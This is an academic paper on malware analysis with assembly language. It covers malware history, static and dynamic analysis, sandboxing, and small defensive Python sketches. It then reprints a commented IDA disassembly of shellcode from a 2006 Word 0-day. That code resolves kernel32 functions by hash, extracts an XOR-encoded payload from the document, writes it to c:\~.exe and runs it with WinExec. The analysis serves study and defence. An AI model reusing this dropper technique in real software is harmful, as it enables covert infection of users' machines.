1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012

Malware Analysis Using Assembly Level
Program

S.Murugan
ACTS Team coordinator ,
CDAC Knowledge Park,
No 1 Old Madras Road,Bangalore,
Karnataka,INDIA
Murugan.sethu@gmail.com

Dr.K.Kuppusamy,
Associate professor
ComputerScience and Engg Dept ,
AlagappaUniversity,Karaikudi,
Tamilnadu,INDIA
kkdiksamy@yahoo.com

Abstract-Malware is an exciting class of program to experiment
with. One advantage of using assembly language is that
you can both create and combat such programs. Generally,
effective malware is written in assembly language. It
would be difficult, if not impossible, to do this with other
languages (except for C), although it is quite easy to write a
self-reproducing program in any language. Viruses have been used
to kill other viruses. One could conceive of viruses and worms
that run around through a system carrying out useful tasks
without direct intervention of particular users. The ability to
forensically analyze malicious software is becoming an
increasingly important discipline in the field of Digital
Forensics. This is because malware is becoming stealthier,
targeted, profit driven, managed by criminal organizations,
harder to detect and much harder to analyze. Malware analysis
requires a considerable skill set to look into deep malware
internals when it is designed specifically to detect and hold back
such attempts. A wide range of tools is available to the analyst,
including debuggers, disassemblers, decompilers, memory
dumpers and unpackers, as well as many other tools common to the
discipline of software engineering. All of these tools require
niche expertise and a thorough understanding of the principles
of their operation and the computers they execute on.
1. INTRODUCTION
Malware, short for malicious software, is software
designed to infiltrate a computer system without the owner's
informed consent. The expression is a general term used by
computer professionals to mean a variety of forms of hostile,
intrusive, or annoying software or program code. The term
"computer virus" is sometimes used as a catch-all phrase to
include all types of malware, including true viruses.
Software is considered to be malware based on the
perceived intent of the creator rather than any particular
features. Malware includes computer viruses, worms, trojan
horses, spyware, dishonest adware, crimeware, most rootkits,
and other malicious and unwanted software. In law, malware
is sometimes known as a computer contaminant, for instance
in the legal codes of several U.S. states, including California
and West Virginia. Malware is not the same as defective
software, which is software that has a legitimate purpose but
contains harmful bugs.
Preliminary results from Symantec published in
2008 suggested that "the release rate of malicious code and
other unwanted programs may be exceeding that of
legitimate software applications." According to F-Secure,
"As much malware [was] produced in 2007 as in the previous
20 years altogether." Malware's most common pathway from
criminals to users is through the Internet: primarily by e-mail
and the World Wide Web.
The prevalence of malware as a vehicle for
organized Internet crime, along with the general inability of
traditional anti-malware protection platforms (products) to
protect against the continuous stream of unique and newly
produced malware, has seen the adoption of a new mindset
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES
Vol No. 2, Issue No. 1, 001 - 012
ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 1
for businesses operating on the Internet: the acknowledgment
that some sizable percentage of Internet customers will
always be infected for some reason or another, and that they
need to continue doing business with infected customers. The
result is a greater emphasis on back-office systems designed
to spot fraudulent activities associated with advanced
malware operating on customers' computers.
On March 29, 2010, Symantec Corporation named
Shaoxing, China as the world's malware capital.
Sometimes, malware is disguised as genuine
software, and may come from an official site. Therefore,
some security programs, such as McAfee, may call malware
"potentially unwanted programs" or "PUP".
Many early infectious programs, including the first
Internet Worm and a number of MS-DOS viruses, were
written as experiments or pranks. They were generally
intended to be harmless or merely annoying, rather than to
cause serious damage to computer systems. In some cases,
the perpetrator did not realize how much harm their creations
would do.

Young programmers learning about viruses and
their techniques wrote them simply to prove that they
could, or to see how far they could spread. As late as 1999,
widespread viruses such as the Melissa virus appear to have
been written chiefly as pranks.
Hostile intent related to vandalism can be found in
programs designed to cause harm or data loss. Many DOS
viruses, and the Windows ExploreZip worm, were designed
to destroy files on a hard disk, or to corrupt the file system by
writing invalid data to them. Network-borne worms such as
the 2001 Code Red worm or the Ramen worm fall into the
same category. Designed to vandalize web pages, worms
may seem like the online equivalent to graffiti tagging, with
the author's alias or affinity group appearing everywhere the
worm goes.

Another strictly for-profit category of malware has
emerged in spyware -- programs designed to monitor users'
web browsing, display unsolicited advertisements, or redirect
affiliate marketing revenues to the spyware creator. Spyware
programs do not spread like viruses; they are, in general,
installed by exploiting security holes or are packaged with
user-installed software, such as peer-to-peer applications.
The best-known types of malware, viruses and
worms, are known for the manner in which they spread,
rather than any other particular behavior. The term computer
virus is used for a program that has infected some executable
software and that, when run, causes the virus to spread to
other executables. Viruses may also contain a payload that
performs other actions, often malicious. A worm, on the
other hand, is a program that actively transmits itself over a
network to infect other computers. It too may carry a
payload. These definitions lead to the observation that a virus
requires user intervention to spread, whereas a worm spreads
itself automatically. Using this distinction, infections
transmitted by email or Microsoft Word documents, which
rely on the recipient opening a file or email to infect the
system, would be classified as viruses rather than worms.
Before Internet access became widespread, viruses
spread on personal computers by infecting programs or the executable
boot sectors of floppy disks. By inserting a copy of itself into the
machine code instructions in these executables, a virus causes
itself to be run whenever a program is run or the disk is
booted. Early computer viruses were written for the Apple II
and Macintosh, but they became more widespread with the
dominance of the IBM PC and MS-DOS system. Executable-
infecting viruses are dependent on users exchanging software
or boot-able floppies, so they spread rapidly in computer
hobbyist circles.
The first worms, network-borne infectious
programs, originated not on personal computers, but on
multitasking UNIX systems. The first well-known worm was
the Internet Worm of 1988, which infected SunOS and VAX
BSD systems. Unlike a virus, this worm did not insert itself
into other programs. Instead, it exploited security holes
(vulnerabilities) in network server programs and started itself
running as a separate process. This same behavior is used by
today's worms as well.

With the rise of the Microsoft Windows platform in
the 1990s, and the flexible macros of its applications, it
became possible to write infectious code in the macro
language of Microsoft Word and similar programs. These
macro viruses infect documents and templates rather than
applications (executables), but rely on the fact that macros in
a Word document are a form of executable code.

Today, worms are most commonly written for the
Windows OS, although a few like Mare-D and the Lion
worm are also written for Linux and UNIX systems. Worms
today work in the same basic way as 1988's Internet Worm:
they scan the network and leverage vulnerable computers to
replicate. Because they need no human intervention, worms
can spread with incredible speed.

2. INTRODUCTION
Malware is software whose intent or effect is malicious.
Analysis of malicious software is
essential for computer security professionals and digital
forensic analysts and is emerging as an important field of
research. Malware is often targeted at organizations and is
increasingly using anti-forensics techniques to prevent
detection and analysis. Commercial Anti-Virus (AV)
software is often limited in its ability to detect and remove
malware. It is highly unlikely to detect new malware that is
unleashed on the Internet or a corporate intranet, or malware
that has been customized to target specific networks.

It is undeniable that there is a digital arms race
between malware developers and malware researchers. As
soon as a technique is developed by one side, the other side
implements a countermeasure. Two of the major trends are
that attackers are increasingly motivated by financial gain
and that there are indications that malware development is
becoming increasingly commercialized and developed by
professionals with extensive software engineering abilities.
Another trend is that malware has an increasing variety of
techniques available to hinder the forensic analyst. This can
include detection of the tools used by the forensic analyst and
prevention of analysis via anti-debugging, anti-disassembly,
anti-emulation, anti-memory dumping, incorporation of fake
signatures and code obfuscation.

Signature based detection of malware is dependent
upon an analyst having already analyzed the malware and
extracted a signature as well as the end user having updated
their malware signature file.

Although these techniques go some way in
protecting a system they are far from infallible and only of
minor assistance to the forensic analyst, especially if the
malware is new or has been customized. The increasing
availability of high-speed Internet connections has
also enabled the rapid production and dissemination of the
malware. All of these factors are contributing to increasing
numbers of network borne malware with respect to volume,
variety and complexity. Security professionals in the field
need to know how to determine if they are the target of an
attack and how to eradicate or mitigate threats from their
systems. This process of threat reduction can be assisted if
security professionals have up to date methodologies and
skill sets at their disposal.

3. THE PROBLEM WITH MALWARE ANALYSIS
The spectrum of malware that represents a real
threat is expansive. A non-exhaustive list includes rootkits,
worms, bots, trojans, logic bombs, viruses, phishing, spam,
spyware, adware, keyloggers and backdoors. No computing
platform or environment is immune to these threats.
Traditionally, malware is thought of as a virus or worm that
has a single function or payload. The resulting
countermeasure for traditional malware has been the
employment of a removal tool that was initiated by signature
detection or by recognition of heuristics defined by specific
behaviors. These tended to be like the malware they were
responding to in that they were unitary or singular in purpose.
Modern network borne malware is increasingly
multi-partite in nature incorporating several infection vectors
and possible payloads in the one instance. Signature based
systems that rely on file hashing or similar functions that
uniquely identify malware based on file contents are
increasingly failing due to the mass customization allowable
with the use of frameworks. Furthermore, anti-forensic
techniques are widely deployed to obfuscate infection, hinder
detection and retard eventual removal of the malware. This
increasing complexity and entropy makes modern malware
analysis a significant undertaking that takes considerable
time, expertise and requires an extensive knowledge domain
either in an individual or in coverage provided by a team of
analysts.
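
The weakness of signatures based on file hashing can be illustrated with a minimal Python sketch. It is not taken from any particular anti-virus product; the helper names (sha256_hex, matches_signature) and the sample byte strings are hypothetical and stand in for a real signature database and real samples.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of a sample as a hex string."""
    return hashlib.sha256(data).hexdigest()


def matches_signature(data: bytes, known_hashes: set) -> bool:
    """A whole-file hash signature matches only byte-identical samples."""
    return sha256_hex(data) in known_hashes


# Hypothetical sample bytes; a real signature file would hold many digests.
original = b"\x90\x90" + b"PAYLOAD" * 8
variant = original + b"\x00"  # one appended byte: a trivial "customization"

known = {sha256_hex(original)}
print(matches_signature(original, known))  # the analyzed sample is detected
print(matches_signature(variant, known))   # the customized variant is missed
```

Because any change to the file contents produces a different digest, a framework that emits a slightly different binary for each target defeats this style of signature without changing the behavior of the malware.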
Two fundamental techniques available to the analyst
are static and dynamic analysis. Static analysis does not
execute the code and the code is analyzed via disassemblies,
call graphs, searches for strings, library calls, and
reconstruction of data structures, enumerations and unions
within the code. This analysis technique is very time
consuming and easily hindered by anti-forensics in the form
of code obfuscation, packers and protectors which are
increasingly being used by malware authors.
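
As a small illustration of the string-search step of static analysis, the following Python sketch pulls printable ASCII and UTF-16LE strings out of a binary blob without executing it. The function name extract_strings, the minimum length of four characters and the sample bytes are assumptions made for this example only.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable ASCII and UTF-16LE strings of at least min_len chars."""
    # Runs of printable ASCII bytes.
    ascii_pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # Runs of printable characters each followed by a zero byte (UTF-16LE).
    utf16_pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_pat.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in utf16_pat.finditer(data)]
    return found


# Hypothetical blob: an ASCII library name and a "unicode" file name.
blob = b"\x00\x01kernel32.dll\x00\xff" + "c:\\~.exe".encode("utf-16-le") + b"\x00\x00"
for s in extract_strings(blob):
    print(s)
```

Packed or encoded samples yield few meaningful strings, which is one reason this technique is easily hindered by packers and protectors.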
Dynamic analysis, in contrast, does run the code and the
analyst observes its behavior and interaction with the host
and network via mechanisms such as registry, file and
network monitoring tools. This technique is generally much
easier to conduct than static analysis but is also easily
hindered by malware that can detect the use of an emulation
environment such as VMware or the use of debugging tools
such as IDA Pro. By detecting the use of these tools and
environments, the malware can change its behavior. Once
detected, the malware can decide not to run its true payload
and can run in a deceptive mode that makes it look like much
less of a threat.
It can delete itself together with any evidence or, if
it is running with the appropriate privileges, damage or
destroy the system that it is running on or attached to.
An effective methodology therefore uses an iterative and
recursive technique that combines static and dynamic
analysis to extract the full functionality of the code,
spiralling in from a higher-level view to a more detailed
view. This technique also provides the opportunity to
discover and mitigate anti-forensic techniques as the
analysis process proceeds.

4. ANALYSIS PROCESS
A high level and simplistic view of the malware
analysis process is depicted in figure 1 below. It shows
malware as one of two inputs to the analysis methodology
process which produces a report as an output. The generated
results also feed back into the analysis methodology via an
assessment process which can be used to adjust the
methodology dynamically, or as a process improvement
mechanism. Legal and ethical constraints serve as a bounding
constraint to the process.


Programming skills are vital for in depth analysis of
malware. Systems level programming, high level languages,
scripting and even assembly language programming are
important skills required to understand how malware is
implemented and how it takes advantage of vulnerabilities. It
is also an important skill set for the development of
customized tools and for scripting disassemblers and
debuggers. The power of being able to script debuggers and
disassemblers should not be underestimated in a malware
analysis context. Many analysis tools now also allow
functionality to be added through user-written
Dynamic Link Library (DLL) plugins or through
scripting languages such as IDAPython, which integrates
IDA Pro scripting with the Python scripting language.

Producers of malware also develop and utilize
advanced programming techniques and technologies such as
distributed computing to enable a competitive advantage over
detection software and techniques. Therefore, it is imperative
that a malware analyst also be well versed in cutting edge
technologies and techniques.

5. MALWARE ANALYSIS
An adaptive, eclectic choice of techniques is
required for analysis of malware. Various methodologies,
such as static and dynamic analysis, and frameworks, such as
PaiMei, exist for the malware analyst. Static analysis is the
examination of code logic and behaviors without execution,
whereas dynamic analysis is the
monitoring and observation of the code as it executes. Both
techniques have strengths and weaknesses. Obfuscation of code may render
static analysis null and void. However, dynamic execution of
that code segment may reveal the next code sections required
for further static analysis. Other common software
engineering techniques, such as profiling, tracing and
debugging are also available, applicable and have utility in
malware analysis. The diversity of malware modus operandi
requires a range of approaches and techniques to perform
successful dissection and analysis of the malware. The skills
needed to perform competent analysis are profound, highly
technical and are at the cutting edge of computer science.
A wide range of tools is available to the analyst,
including debuggers, disassemblers, decompilers, memory
dumpers and unpackers, as well as many other tools common to
the discipline of software engineering. All of these tools
require niche expertise and a thorough understanding of the
principles of their operation and the computers they execute
on. However, whether or not the tools are forensically sound
and their use acceptable in a court of law is a matter that
needs to be seriously considered.

Some useful tools are available from hacking and
software cracking sites that would not be considered
forensically sound without considerable validation or black
box testing. Such tools could contain trojans and could easily
hide a malicious purpose. They may not be forensically
acceptable without significant due diligence on the part of the
person or organizations using these types of tools. Other
software cracking or reverse engineering sites have scripts
for debuggers that can be easily and readily examined. These
scripts are useful to extract the known algorithm for dealing
with particular packers or to mitigate particular anti-forensic
techniques used by creators of such software.

Analysis of malware will typically require
configuring a complete virtual environment suitable for it to
run in, not only from an operating systems perspective, but
also the inclusion of network infrastructure and services.
Modern malware is increasingly network-borne and
network-enabled, so it may be necessary to provide an environment in
which the malware can use common services such
as a Domain Name System (DNS) server, a Simple Mail
Transfer Protocol (SMTP) server or an Internet Relay Chat
(IRC) server. Such an environment
lets the malware initiate communications with these
services, so that the resulting traffic can be captured to assist
in the dynamic analysis of the malware.
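
A simulated service of this kind can be very simple. The following Python sketch models only the reply logic of a fake SMTP server that accepts every command and records what the client sends. It is an illustrative assumption rather than a description of any particular tool: the class name FakeSmtpSession, the placeholder host name and the canned replies are all hypothetical, and the socket handling needed to expose it on an isolated analysis network is omitted.

```python
from dataclasses import dataclass, field
from typing import List

# Canned replies keyed by SMTP verb; the host name is a made-up placeholder.
CANNED_REPLIES = {
    "HELO": "250 sandbox.invalid",
    "EHLO": "250 sandbox.invalid",
    "MAIL": "250 OK",
    "RCPT": "250 OK",
    "DATA": "354 End data with <CR><LF>.<CR><LF>",
    "QUIT": "221 Bye",
}


@dataclass
class FakeSmtpSession:
    """Accepts any mail and logs every line the client sends."""
    log: List[str] = field(default_factory=list)
    in_data: bool = False

    def feed(self, line: str) -> str:
        """Record one client line and return the reply to send back."""
        line = line.rstrip("\r\n")
        self.log.append(line)
        if self.in_data:
            if line == ".":          # a lone dot ends the message body
                self.in_data = False
                return "250 OK"
            return ""                # body lines receive no reply
        verb = line.split(" ", 1)[0].upper()
        if verb == "DATA":
            self.in_data = True
        return CANNED_REPLIES.get(verb, "500 Unrecognized command")
```

Feeding the session the lines a sample sends (for example "HELO host", "MAIL FROM:<...>", "DATA", the message body and a final ".") leaves the complete conversation in the log attribute for later inspection.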

This type of environment may be hosted on
commercial virtualization products
such as VMware or Virtual PC.

It should be noted that because malware can contain
the ability to detect these virtualized environments as a result
of their hardware and software fingerprints, the ability to
configure real systems and devices may need serious
consideration. This will require the configuration of a
particular computing host environment, or network device or
other system administrative tasks in order to achieve this.
This type of environment would need strict control and
isolation to prevent the spread of malware.

6. CODE

seg000:00000000 ;
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ; This file is generated by The Interactive Disassembler (IDA)
seg000:00000000 ; Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com>
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ;
seg000:00000000 ; File Name : C:\Documents and Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc
seg000:00000000 ; Format : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded length: 246F5h
seg000:00000000 ;
seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
seg000:00000000 ;
seg000:00000000 ; This is a commented disassembly of the Word 0-day released in
seg000:00000000 ; mid-late May 2006. This document does not describe the vulnerability
seg000:00000000 ; or malware that results from an infection.
seg000:00000000 ;
seg000:00000000
seg000:00000000
seg000:00000000 unicode macro page,string,zero
seg000:00000000 irpc c,<string>
seg000:00000000 db '&c', page
seg000:00000000 endm
seg000:00000000 ifnb <zero>
seg000:00000000 dw zero
seg000:00000000 endif
seg000:00000000 endm
seg000:00000000
seg000:00000000 .686p
seg000:00000000 .mmx
seg000:00000000 .model flat
seg000:00000000

seg000:00000000 ---------------------------------------------------------------------------
seg000:00000B2E
seg000:00000B2E ; The shellcode starts here. It uses Dino Dai Zovi's PEB resolution method
seg000:00000B2E ; to load the base address of kernel32.dll. This information will be
seg000:00000B2E ; used to locate the addresses of kernel32's exports (because they
seg000:00000B2E ; are offsets from the base address).
seg000:00000B2E
seg000:00000B2E nop
seg000:00000B2F nop
seg000:00000B30 mov eax, fs:off_30 ; load PEB address into eax
seg000:00000B36 mov eax, [eax+0Ch]
seg000:00000B39 mov esi, [eax+1Ch]
seg000:00000B3C lodsd
seg000:00000B3D mov esi, [eax+8] ; kernel32.dll base address
seg000:00000B40 jmp loc_DAF
seg000:00000B40
seg000:00000B40 ; At this point, the code jumps to loc_DAF, which immediately calls sub_B45.
seg000:00000B40 ; In doing so, the call instruction pushes its return address, 0x00000DB4
seg000:00000B40 ; (offset in this file), on the stack. Notably, the first
seg000:00000B40 ; instruction in sub_B45 is to pop this address into eax (see below)
seg000:00000B40
seg000:00000B45
seg000:00000B45 ; S U B R O U T I N E

seg000:00000B45
seg000:00000B45
seg000:00000B45 ; The first part of this code loads the address to which EIP points
seg000:00000B45 ; into the eax register. If you look at 0x00000DB4, there isn't much,
seg000:00000B45 ; but a dword (0A2000h) and three unicode strings of file names.
seg000:00000B45 ; The code uses the offset of these values from EIP to reference them and
seg000:00000B45 ; builds a structure with pointers to them. The same structure will be used
seg000:00000B45 ; to store addresses of all the kernel32 exports later. In the code
seg000:00000B45 ; below, edi contains a pointer to the first member of the structure.
seg000:00000B45
seg000:00000B45 sub_B45 proc near ; CODE XREF: seg000:loc_DAFp
seg000:00000B45 pop eax
seg000:00000B46 sub esp, 200h
seg000:00000B4C mov edi, esp
seg000:00000B4E mov ebx, [eax] ; [eax] == 0A2000h
seg000:00000B50 mov [edi+4], ebx
seg000:00000B53 mov [edi+SCRATCH.hKernel32], esi ; base address of kernel32
seg000:00000B56 add eax, 4
seg000:00000B59 mov [edi+SCRATCH.String1], eax ; c:\~$
seg000:00000B5C add eax, 0Ch
seg000:00000B5F mov [edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B62 add eax, 12h
seg000:00000B65 mov [edi+SCRATCH.String3], eax ; c:\~.exe
seg000:00000B6B push edi ; saves the scratch pad for use within loc_BA1
seg000:00000B6C mov edi, esp
seg000:00000B6E xor edi, 0FFFFh
seg000:00000B74 dec edi
seg000:00000B77
seg000:00000B77 ; The next instructions search memory for the original Word document's
seg000:00000B77 ; own filename. The last mov (above) places the esp pointer into edi.
seg000:00000B77 ; The loop works by reading a dword from edi and comparing it to the
seg000:00000B77 ; unicode equivalent of "oc". If it matches then it begins to search
seg000:00000B77 ; for ".d" (which completes the ".doc" extension). Otherwise,
seg000:00000B77 ; it decrements edi and grabs another dword. When done, it jumps
seg000:00000B77 ; to loc_BA1.
seg000:00000B77
seg000:00000B77 loc_B77: ; CODE XREF: sub_B45+39j
seg000:00000B77 ; sub_B45+45j ...
seg000:00000B78 cmp dword ptr [edi], 63006Fh ; "oc"
seg000:00000B7E jnz short loc_B77
seg000:00000B84 cmp dword ptr [edi], 64002Eh ; ".d"
seg000:00000B8A jnz short loc_B77
seg000:00000B8C push 0C8h
seg000:00000B91 pop ecx
seg000:00000B92 mov esi, edi
seg000:00000B94
seg000:00000B94 loc_B94: ; CODE XREF: sub_B45+58j
seg000:00000B94 dec esi
seg000:00000B95 cmp dword ptr [esi], 5C003Ah
seg000:00000B9B jz short loc_BA1 ; finished - jump to loc_BA1
seg000:00000B9D loop loc_B94
seg000:00000B9F jmp short loc_B77 ; failed - start over again from loc_B77

seg000:00000BA1 ; ---------------------------------------------------------------------------
seg000:00000BA1
seg000:00000BA1 ; This is the section that fills the shellcode's own structure
seg000:00000BA1 ; members with pointers to kernel32 exports. Once again, edi contains
seg000:00000BA1 ; the pointer to the structure's first member, so all [edi+xyz] are
seg000:00000BA1 ; references to the additional members. The loop here consists of
seg000:00000BA1 ; pushing two parameters on the stack - a dword hash of the function name
seg000:00000BA1 ; (probably hashed to obfuscate the functions it imports) and the
seg000:00000BA1 ; base address of kernel32.dll. Each iteration calls resolve_func
seg000:00000BA1 ; for the actual work (see 0x00000D5B of this file). When complete,
seg000:00000BA1 ; the code knows exactly where to find all the system resources and
seg000:00000BA1 ; functions it needs.
seg000:00000BA1 ;
seg000:00000BA1 ; Note the xyz field in all the [edi+xyz] operands are natively
seg000:00000BA1 ; numerical. My co-worker Ryan reversed the resolve_func sub routine
seg000:00000BA1 ; and renamed them for readability.
seg000:00000BA1
seg000:00000BA1
seg000:00000BA1 loc_BA1: ; CODE XREF: sub_B45+56j
seg000:00000BA1 dec esi
seg000:00000BA2 dec esi
seg000:00000BA3 pop edi
seg000:00000BA4 mov [edi+SCRATCH.szDOCFILENAME], esi
seg000:00000BA7 push [edi+SCRATCH.hKernel32]
seg000:00000BAA push 0C0397ECh ; GlobalAlloc
seg000:00000BAF call resolve_func
seg000:00000BB4 mov [edi+SCRATCH.pGlobalAlloc], eax
seg000:00000BB7 push [edi+SCRATCH.hKernel32]
seg000:00000BBA push 7CB922F6h ; GlobalFree
seg000:00000BBF call resolve_func
seg000:00000BC4 mov [edi+SCRATCH.pGlobalFree], eax
seg000:00000BC7 push dword ptr [edi+8]
seg000:00000BCA push 7C0017BBh ; CreateFileW
seg000:00000BCF call resolve_func
seg000:00000BD4 mov [edi+SCRATCH.pCreateFileW], eax
seg000:00000BD7 push dword ptr [edi+8]
seg000:00000BDA push 0FFD97FBh ; CloseHandle
seg000:00000BDF call resolve_func
seg000:00000BE4 mov [edi+SCRATCH.pCloseHandle], eax
seg000:00000BE7 push dword ptr [edi+8]
seg000:00000BEA push 10FA6516h ; ReadFile
seg000:00000BEF call resolve_func
seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax
seg000:00000BF7 push dword ptr [edi+8]
seg000:00000BFA push 0E80A791Fh ; WriteFile
seg000:00000BFF call resolve_func
seg000:00000C04 mov [edi+SCRATCH.pWriteFile], eax
seg000:00000C07 push dword ptr [edi+8]
seg000:00000C0A push 0C2FFB03Bh ; DeleteFileW
seg000:00000C0F call resolve_func
seg000:00000C14 mov [edi+SCRATCH.pDeleteFileW], eax
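seg000:00000C17 push dword ptr [edi+8]
seg000:00000C1A push 76DA08ACh ; SetFilePointer
seg000:00000C1F call resolve_func
seg000:00000C24 mov [edi+SCRATCH.pSetFilePointer], eax
seg000:00000C27 push dword ptr [edi+8]
seg000:00000C2A push 0E8AFE98h ; WinExec
seg000:00000C2F call resolve_func
seg000:00000C34 mov [edi+SCRATCH.pWinExec], eax
seg000:00000C37 push dword ptr [edi+8]
seg000:00000C3A push 99EC8974h ; CopyFileW
seg000:00000C3F call resolve_func
seg000:00000C44 mov [edi+SCRATCH.pCopyFileW], eax
seg000:00000C47 push dword ptr [edi+8]
seg000:00000C4A push 73E2D87Eh ; ExitProcess
seg000:00000C4F call resolve_func
seg000:00000C54 mov [edi+SCRATCH.pExitProcess], eax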
seg000:00000C54
seg000:00000C54 ; Delete any previously existing files of the same name. Recall these are
seg000:00000C54 ; two of the three unicode file names discussed earlier.
seg000:00000C54
seg000:00000C57 push [edi+SCRATCH.String2] ; c:\~.exe
seg000:00000C5A call [edi+SCRATCH.pDeleteFileW]
seg000:00000C5D push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C60 call [edi+SCRATCH.pDeleteFileW]
seg000:00000C63
seg000:00000C63 ; The next 3 push instructions are preparing the arguments for CopyFile.
seg000:00000C63 ; Top down, they are 0 (for overwriting permission), destination
seg000:00000C63 ; file name, and source file name (derived by the code's memory searching
seg000:00000C63 ; technique).
seg000:00000C63
seg000:00000C63 push 0
seg000:00000C65 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C68 push [edi+SCRATCH.szDOCFILENAME]
seg000:00000C6B call [edi+SCRATCH.pCopyFileW]
seg000:00000C6E
seg000:00000C6E ; The next 7 push instructions are preparing the arguments for CreateFile.
seg000:00000C6E ; Despite the function name, this only opens an already existing file (in
seg000:00000C6E ; particular an exact copy of the original Word document now at c:\~$ after
seg000:00000C6E ; CopyFile).
seg000:00000C6E
seg000:00000C6E push 0
seg000:00000C70 push 80h
seg000:00000C75 push 3
seg000:00000C77 push 0
seg000:00000C79 push 0
seg000:00000C7B push 80000000h
seg000:00000C80 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C83 call [edi+SCRATCH.pCreateFileW]
seg000:00000C86
seg000:00000C86 ; This is where it gets a little interesting. The code places its read
seg000:00000C86 ; pointer at EOF and moves -4 bytes (back toward the beginning). This
seg000:00000C86 ; is the offset to where the output file begins. It reads data into
seg000:00000C86 ; a buffer, makes a call to allocate storage on the heap, then resets the
seg000:00000C86 ; read pointer and does a second iteration with different offsets. Once it
seg000:00000C86 ; has collected all the data, it proceeds to loc_CEA for processing.
seg000:00000C86
seg000:00000C86 mov [edi+SCRATCH.hInputFile], eax
seg000:00000C89 push FILE_END
seg000:00000C8B push 0
seg000:00000C8D push -4
seg000:00000C8F push [edi+SCRATCH.hInputFile]
seg000:00000C92 call [edi+SCRATCH.pSetFilePointer]
seg000:00000C95 push 0
seg000:00000C97 lea ebx, [edi+SCRATCH.endMarker]
seg000:00000C9D push ebx
seg000:00000C9E push 4
seg000:00000CA0 lea ebx, [edi+SCRATCH.field_4]
seg000:00000CA3 push ebx
seg000:00000CA4 push [edi+SCRATCH.hInputFile] ; handle to c:\~$
seg000:00000CA7 call [edi+SCRATCH.pReadFile]
seg000:00000CAA push [edi+SCRATCH.field_4]
seg000:00000CAD push 40h ; '@' ; uFlags = 40h (GPTR, zero-initialized); size is field_4
seg000:00000CAF call [edi+SCRATCH.pGlobalAlloc]
seg000:00000CB2 mov [edi+SCRATCH.pMallocdBuff0], eax
seg000:00000CB5 mov ebx, [edi+SCRATCH.field_4]
seg000:00000CB8 add ebx, 4
seg000:00000CBB not ebx
seg000:00000CBD inc ebx
seg000:00000CBE push 2 ; new offsets and starting loc
seg000:00000CC0 push 0
seg000:00000CC2 push ebx
seg000:00000CC3 push [edi+SCRATCH.hInputFile]
seg000:00000CC6 call [edi+SCRATCH.pSetFilePointer]
seg000:00000CC9 push 0
seg000:00000CCB lea ebx, [edi+SCRATCH.endMarker]
seg000:00000CD1 push ebx
seg000:00000CD2 push [edi+SCRATCH.field_4]
seg000:00000CD5 push [edi+SCRATCH.pMallocdBuff0]
seg000:00000CD8 push [edi+SCRATCH.hInputFile]
seg000:00000CDB call [edi+SCRATCH.pReadFile]
seg000:00000CDE push [edi+SCRATCH.hInputFile]
seg000:00000CE1 call [edi+SCRATCH.pCloseHandle]
seg000:00000CE4 mov eax, [edi+SCRATCH.field_4]
seg000:00000CE7 mov ebx, [edi+SCRATCH.pMallocdBuff0]
seg000:00000CEA
seg000:00000CEA ; This section of code loops through all bytes in the buffer filled by the
seg000:00000CEA ; previous ReadFile() functions and xor's them with 0x81. In the instructions,
seg000:00000CEA ; ebx is the array index and eax is the counter. This xor-encoding
seg000:00000CEA ; scheme obfuscates the code and could help evade IDS detection in
seg000:00000CEA ; some cases.
seg000:00000CEA
seg000:00000CEA loc_CEA: ; CODE XREF: sub_B45+1ADj
seg000:00000CEA xor byte ptr [ebx], 81h ; The output file is static xor'd with 0x81
seg000:00000CED inc ebx
seg000:00000CEE dec eax
seg000:00000CEF cmp eax, 0
seg000:00000CF2 jnz short loc_CEA
seg000:00000CF4
seg000:00000CF4 ; At this point, the decoded payload exists on the heap. What to do with it?
seg000:00000CF4 ; Write it to disk of course! And use the last remaining unicode string as its
seg000:00000CF4 ; file name.
seg000:00000CF4
seg000:00000CF4 push 0
seg000:00000CF6 push 80h
seg000:00000CFB push 2
seg000:00000CFD push 0
seg000:00000CFF push 0
seg000:00000D01 push 40000000h
seg000:00000D06 push [edi+SCRATCH.String2] ; c:\~.exe
seg000:00000D09 call [edi+SCRATCH.pCreateFileW]
seg000:00000D0C mov [edi+SCRATCH.hFileTwo], eax
seg000:00000D0F push 0
seg000:00000D11 lea ebx, [edi+SCRATCH.endMarker]
seg000:00000D17 push ebx
seg000:00000D18 push [edi+SCRATCH.field_4]
seg000:00000D1B push [edi+SCRATCH.pMallocdBuff0]
seg000:00000D1E push eax
seg000:00000D1F call [edi+SCRATCH.pWriteFile]
seg000:00000D22 push 0
seg000:00000D24 lea ebx, [edi+SCRATCH.endMarker]
seg000:00000D2A push ebx
seg000:00000D2B push 0FFh
seg000:00000D30 push [edi+SCRATCH.szDOCFILENAME]
seg000:00000D33 push [edi+SCRATCH.hFileTwo]
seg000:00000D36 call [edi+SCRATCH.pWriteFile]
seg000:00000D39 push [edi+SCRATCH.hFileTwo]
seg000:00000D3C
seg000:00000D3C ; The code is cleaning up by closing its open file handles and releasing
seg000:00000D3C ; the heap back to the OS.
seg000:00000D3C
seg000:00000D3C call [edi+SCRATCH.pCloseHandle]
seg000:00000D3F push [edi+SCRATCH.pMallocdBuff0]
seg000:00000D42 call [edi+SCRATCH.pGlobalFree]
seg000:00000D45
seg000:00000D45 ; Here the code calls WinExec() to launch the new executable it has just
seg000:00000D45 ; written to disk. Then it deletes the copy of the original Word doc that
seg000:00000D45 ; it saved to c:\~$ and exits.
seg000:00000D45
